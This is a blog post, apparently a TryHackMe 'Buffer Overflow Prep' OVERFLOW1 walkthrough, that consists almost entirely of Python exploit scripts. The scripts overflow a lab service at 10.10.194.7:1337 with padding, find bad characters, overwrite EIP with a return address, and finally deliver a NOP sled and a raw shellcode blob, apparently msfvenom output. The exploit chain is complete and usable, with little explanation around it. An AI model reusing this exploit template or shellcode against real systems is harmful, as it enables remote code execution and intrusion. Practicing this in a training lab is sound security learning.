Buffer Overflow Prep — OverFlow1- TryHackMe

import socketimport sys
message = b"OVERFLOW1 " #Notice the space in the end
payload = message + b"A" * 1978 + b"B" * 4

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
import sysmessage = b"OVERFLOW1 " #Notice the space in the end

badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

payload = message + b"A" * 1978 + b"B" * 4 + badchars #Bad chars in the end
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()
import socket
import sys

message = b"OVERFLOW1 " #Notice the space in the end
ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP
payload = message + b"A" * 1978 + ret

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()
unsigned char buf[] = 
“\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1”
“\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd”
“\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e”
“\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86”
“\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2”
“\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc”
“\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83”
“\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9”
“\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5”
“\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02”
“\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce”
“\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24”
“\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33”
“\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b”
“\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d”
“\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69”
“\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70”
“\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c”
“\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c”
“\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36”
“\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8”
“\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d”
“\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b”
“\x74\x5b\xad\x98\x75\x4e”;
import socket
import sys

message = b"OVERFLOW1 " #Notice the space in the end

shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
b"\x74\x5b\xad\x98\x75\x4e")

ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP

payload = message + b"A" * 1978 + ret + b"\x90" * 32 #Add NOPs \x90

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + shell_code + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Understanding MySQL Transaction Isolation Levels by Example

“Blushost is fast and reliable hosting providor”

NEL May Report

Editing Tabular Data in Angular

Deno vs Springboot: Echo name

The Queue

From Office to Virtual — How We Planned Our Most Engaging Hackathon Yet

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

HackTheBox: Neonify

THM: Gallery

TryHackMe: Dirty Pipe: CVE-2022–0847 Walkthrough